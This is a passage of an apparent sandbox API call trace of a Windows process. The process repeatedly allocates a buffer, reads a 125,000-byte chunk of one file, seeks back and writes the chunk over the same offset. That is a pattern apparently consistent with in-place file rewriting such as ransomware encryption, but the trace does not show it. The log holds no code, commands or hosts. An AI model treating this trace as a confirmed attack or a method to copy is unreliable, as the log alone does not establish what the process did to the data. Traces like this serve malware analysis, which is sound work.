lpOverlapped=0x0) returned 1 [0121.018] GetProcessHeap () returned 0x500000 [0121.018] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0121.018] GetProcessHeap () returned 0x500000 [0121.018] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0121.018] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x61c06a0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.018] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0121.027] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x61c06a0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.027] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0121.028] GetProcessHeap () returned 0x500000 [0121.028] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0121.028] GetProcessHeap () returned 0x500000 [0121.028] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0121.028] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x61fd730, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.028] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0121.043] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x61fd730, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.043] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0121.044] GetProcessHeap () returned 0x500000 [0121.044] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0121.044] GetProcessHeap () returned 0x500000 [0121.044] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0121.044] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x623a7c0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.044] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0121.053] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x623a7c0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.053] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0121.053] GetProcessHeap () returned 0x500000 [0121.053] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0121.053] GetProcessHeap () returned 0x500000 [0121.053] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0121.053] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x6277850, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.053] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0121.062] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x6277850, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.062] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0121.063] GetProcessHeap () returned 0x500000 [0121.063] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0121.063] GetProcessHeap () returned 0x500000 [0121.063] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0121.063] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x62b48e0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.063] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0121.073] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x62b48e0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.073] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0121.073] GetProcessHeap () returned 0x500000 [0121.074] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0121.074] GetProcessHeap () returned 0x500000 [0121.074] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0121.074] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x62f1970, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.074] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0121.090] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x62f1970, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.090] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0121.091] GetProcessHeap () returned 0x500000 [0121.091] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0121.091] GetProcessHeap () returned 0x500000 [0121.091] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0121.091] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x632ea00, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.091] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0121.099] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x632ea00, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.099] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0121.100] GetProcessHeap () returned 0x500000 [0121.100] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0121.100] GetProcessHeap () returned 0x500000 [0121.100] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0121.100] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x636ba90, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.100] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0121.112] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x636ba90, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.112] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0121.112] GetProcessHeap () returned 0x500000 [0121.112] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0121.112] GetProcessHeap () returned 0x500000 [0121.112] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0121.112] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x63a8b20, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.112] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0121.121] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x63a8b20, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.121] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0121.121] GetProcessHeap () returned 0x500000 [0121.121] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0121.121] GetProcessHeap () returned 0x500000 [0121.122] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0121.122] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x63e5bb0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.122] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0121.139] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x63e5bb0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.139] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0121.140] GetProcessHeap () returned 0x500000 [0121.140] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0121.140] GetProcessHeap () returned 0x500000 [0121.140] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0121.140] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x6422c40, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.140] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0121.186] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x6422c40, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.186] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0121.187] GetProcessHeap () returned 0x500000 [0121.187] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0121.187] GetProcessHeap () returned 0x500000 [0121.187] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0121.187] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x645fcd0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.187] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0121.195] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x645fcd0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.196] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0121.196] GetProcessHeap () returned 0x500000 [0121.196] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0121.196] GetProcessHeap () returned 0x500000 [0121.196] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0121.196] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x649cd60, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.196] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0121.211] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x649cd60, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.211] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0121.211] GetProcessHeap () returned 0x500000 [0121.211] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0121.211] GetProcessHeap () returned 0x500000 [0121.211] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0121.211] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x64d9df0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.211] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0121.221] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x64d9df0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.221] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0121.222] GetProcessHeap () returned 0x500000 [0121.222] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0121.222] GetProcessHeap () returned 0x500000 [0121.222] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0121.222] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x6516e80, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.222] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0121.239] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x6516e80, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.240] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0121.240] GetProcessHeap () returned 0x500000 [0121.240] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0121.240] GetProcessHeap () returned 0x500000 [0121.240] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0121.240] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x6553f10, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.240] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0121.249] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x6553f10, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.249] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0121.249] GetProcessHeap () returned 0x500000 [0121.249] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0121.249] GetProcessHeap () returned 0x500000 [0121.249] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0121.249] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x6590fa0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.249] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0121.260] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x6590fa0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.260] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0121.260] GetProcessHeap () returned 0x500000 [0121.260] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0121.260] GetProcessHeap () returned 0x500000 [0121.260] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0121.260] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x65ce030, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.260] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0121.268] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x65ce030, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.268] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0121.269] GetProcessHeap () returned 0x500000 [0121.269] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0121.269] GetProcessHeap () returned 0x500000 [0121.269] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0121.269] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x660b0c0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.269] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0121.288] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x660b0c0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.288] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0121.288] GetProcessHeap () returned 0x500000 [0121.288] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0121.289] GetProcessHeap () returned 0x500000 [0121.289] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0121.289] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x6648150, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.289] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0121.300] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x6648150, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.301] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0121.301] GetProcessHeap () returned 0x500000 [0121.301] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0121.301] GetProcessHeap () returned 0x500000 [0121.301] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0121.301] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x66851e0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.301] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0121.312] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x66851e0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.312] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0121.313] GetProcessHeap () returned 0x500000 [0121.313] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0121.313] GetProcessHeap () returned 0x500000 [0121.314] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0121.314] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x66c2270, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.314] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0121.324] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x66c2270, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.324] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295ebcc*=0x1e848, lpOverlapped=0x0) returned 1 [0121.324] GetProcessHeap () returned 0x500000 [0121.324] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0121.324] GetProcessHeap () returned 0x500000 [0121.324] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1e848) returned 0x5557b0 [0121.325] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x66ff300, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.325] ReadFile (in: hFile=0x220, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x1e848, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295ebc0*=0x1e848, lpOverlapped=0x0) returned 1 [0121.344] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x66ff300, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.344] WriteFile (in: hFile=0x220, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x1e848, lpNumberOfBytesWritten=0x295ebcc, 